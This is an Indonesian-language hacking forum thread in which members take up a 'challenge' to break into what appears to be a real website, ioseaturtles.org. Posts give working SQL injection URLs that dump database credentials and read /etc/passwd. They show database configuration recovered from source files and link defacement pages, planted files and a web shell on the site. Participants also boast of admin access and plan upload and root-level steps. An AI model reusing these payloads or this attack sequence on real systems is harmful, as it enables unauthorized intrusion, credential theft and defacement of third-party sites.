gblack's Challenge Level 1 - Hax This Site!
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Re: gblack's Challenge Level 1 - Hax This Site!
@bom2
Yah bagos lah klo smua orang Indonesia berpikir kek elu! Di sini tuh tempat orang buad belajar, bukan nyari duid... Gw pun di sini karena masih pengen belajar! Klo elu mw nyari duid mendingan jgn di sini & ga usah ikut campur ama orang2 yang lagi belajar! Ngotor2in thread aza...!!
@poni
Sabar cuy... Banyak banget yg penasaran neh... Heuheuheuheu...
Yah bagos lah klo smua orang Indonesia berpikir kek elu! Di sini tuh tempat orang buad belajar, bukan nyari duid... Gw pun di sini karena masih pengen belajar! Klo elu mw nyari duid mendingan jgn di sini & ga usah ikut campur ama orang2 yang lagi belajar! Ngotor2in thread aza...!!
@poni
Sabar cuy... Banyak banget yg penasaran neh... Heuheuheuheu...
Down doesn't mean die.
I will never die,
gbLaCk-
Re: gblack's Challenge Level 1 - Hax This Site!
ikutan nunggu ah....jadi peanasaran jg :ngakak:
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: gblack's Challenge Level 1 - Hax This Site!
Lanjutin dikit walau gak ada artinya :adwisatya wrote:Cuma mau menambah dikit, walau belum sampe nanam backdoor.
Code: Select all
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,version(),3,user(),database(),6,7,8,9,10--
Code: Select all
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,version(),3,user(),database(),6,7,8,9,10+from+phpbb_users--
Code: Select all
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,version(),3,group_concat(username,0x3a,password),database(),6,7,8,9,10+from+login--
Code: Select all
http://ioseaturtles.org/webadmin/login.php
Code: Select all
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10--
...n0 l1m17...
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: gblack's Challenge Level 1 - Hax This Site!
Lanjutin yg di atas sekalian, sapa tau aja ada hubungannya :
Wew tapi bingung selanjutnya mo diapain lagi yakss...??? :circle:
Code: Select all
[b]Info penting pada /etc/passwd:[/b]
turtlefa:x:107:1::/web/./ioseaturtles:/bin/true
[b]Webdir:[/b]
/web/./ioseaturtles
[b]Nyari file yg mgkn ada:[/b]
/web/./ioseaturtles/index.php
[b]View Source, dpt baris ini:[/b]
/* Include Files *********************/
session_start();
include_once("_include/function.php");
include_once("_include/class.mysql.php");
/*************************************/
[b]Lanjut, ke file berikutnya:[/b]
/web/./ioseaturtles/_include/class.mysql.php
[b]View Source lagi, dpt baris ini :[/b]
define("EZSQL_DB_USER", "turtlepma");
define("EZSQL_DB_PASSWORD", "xxxxxxxx"); << Sensor Dikit Ahh...!!!
define("EZSQL_DB_NAME", "turtle");
define("EZSQL_DB_HOST", "localhost");
[b]Nyari halaman phpmyadmin, dapatx ini:[/b]
http://ioseaturtles.org/phpmyadmin/
...n0 l1m17...
Re: gblack's Challenge Level 1 - Hax This Site!
@3xtr3m3b0y
Congratz! You got the clue bro... :love:
2 more steps... :kaca:
Congratz! You got the clue bro... :love:
2 more steps... :kaca:
Down doesn't mean die.
I will never die,
gbLaCk-
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: gblack's Challenge Level 1 - Hax This Site!
Wah masa sech Omz... :kaca:gblack wrote:@3xtr3m3b0y
Congratz! You got the clue bro... :love:
2 more steps... :kaca:
Klo gtu numpang nyoret dikit ahh...!!! :usap:
http://ioseaturtles.org/UserFiles/File/ ... 3m3b0y.txt
Maap cmn bisa itu doank...!!! :usap:
...n0 l1m17...
Re: gblack's Challenge Level 1 - Hax This Site!
Akhirnyah... :malumalu:
Huehuehuehuehue...
@3xtr3m3b0y
+1 :love:
Congratz bro! Talk less do more!! Dont be like bom2... :ngakak:
Huehuehuehuehue...
@3xtr3m3b0y
+1 :love:
Congratz bro! Talk less do more!! Dont be like bom2... :ngakak:
Down doesn't mean die.
I will never die,
gbLaCk-
Re: gblack's Challenge Level 1 - Hax This Site!
hoaaaammmm... baru bangun...
sory om gblack... tadi malam ga bisa jawab udah ketiduran :mati: :mati: :mati:
om, nitip defacer ya :devil :devil :devil
http://ioseaturtles.org/UserFiles/.../.b10.html
oh ya om, nih gimana sih caranya? om gblack hebat ya :omg: :omg: :omg:
nitip 1 ya... ^_^ lagi pengen nyamain tempat ma om gblack http://ioseaturtles.org/UserFiles/.../.bi4kkob4r.txt
terus ini om, ga sengaja ke pencet print screen
Ga sengaja bisa masuk admin om :maaf: :maaf: :maaf:
keep going deh
tapa lagi ya om :kaca: :kaca:
hummm..hummm :tapa: :tapa: :tapa:
sory om gblack... tadi malam ga bisa jawab udah ketiduran :mati: :mati: :mati:
om, nitip defacer ya :devil :devil :devil
http://ioseaturtles.org/UserFiles/.../.b10.html
oh ya om, nih gimana sih caranya? om gblack hebat ya :omg: :omg: :omg:
nitip 1 ya... ^_^ lagi pengen nyamain tempat ma om gblack http://ioseaturtles.org/UserFiles/.../.bi4kkob4r.txt
terus ini om, ga sengaja ke pencet print screen
Ga sengaja bisa masuk admin om :maaf: :maaf: :maaf:
keep going deh
tapa lagi ya om :kaca: :kaca:
hummm..hummm :tapa: :tapa: :tapa:
I think just : Make better than the best
Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.
Always INject your brain with the greatest knowledges.
Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.
Always INject your brain with the greatest knowledges.
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: gblack's Challenge Level 1 - Hax This Site!
Wew...cmn bisa Leng..geleng..6x sama master2 di atas :malumalu:
Ayuuk dilanjut ke :
Level 2 : Ngupload or Create File PHP (Text Only not Backdoor)
Level 3 : Ngeroot (Create a file in /etc dir as a proof)
Dinantikan info selanjutnya...!!!
Turu maneh...!!! :tidur:
Ayuuk dilanjut ke :
Level 2 : Ngupload or Create File PHP (Text Only not Backdoor)
Level 3 : Ngeroot (Create a file in /etc dir as a proof)
Dinantikan info selanjutnya...!!!
Turu maneh...!!! :tidur:
...n0 l1m17...
Re: gblack's Challenge Level 1 - Hax This Site!
:malumalu: :malumalu: :malumalu:
nih punya om gblack nih... http://ioseaturtles.org/UserFiles/image ... kshell.php
ha..ha... cari dong punya Bi4kKob4r dimana :devil :devil :devil
nih punya om gblack nih... http://ioseaturtles.org/UserFiles/image ... kshell.php
ha..ha... cari dong punya Bi4kKob4r dimana :devil :devil :devil
I think just : Make better than the best
Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.
Always INject your brain with the greatest knowledges.
Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.
Always INject your brain with the greatest knowledges.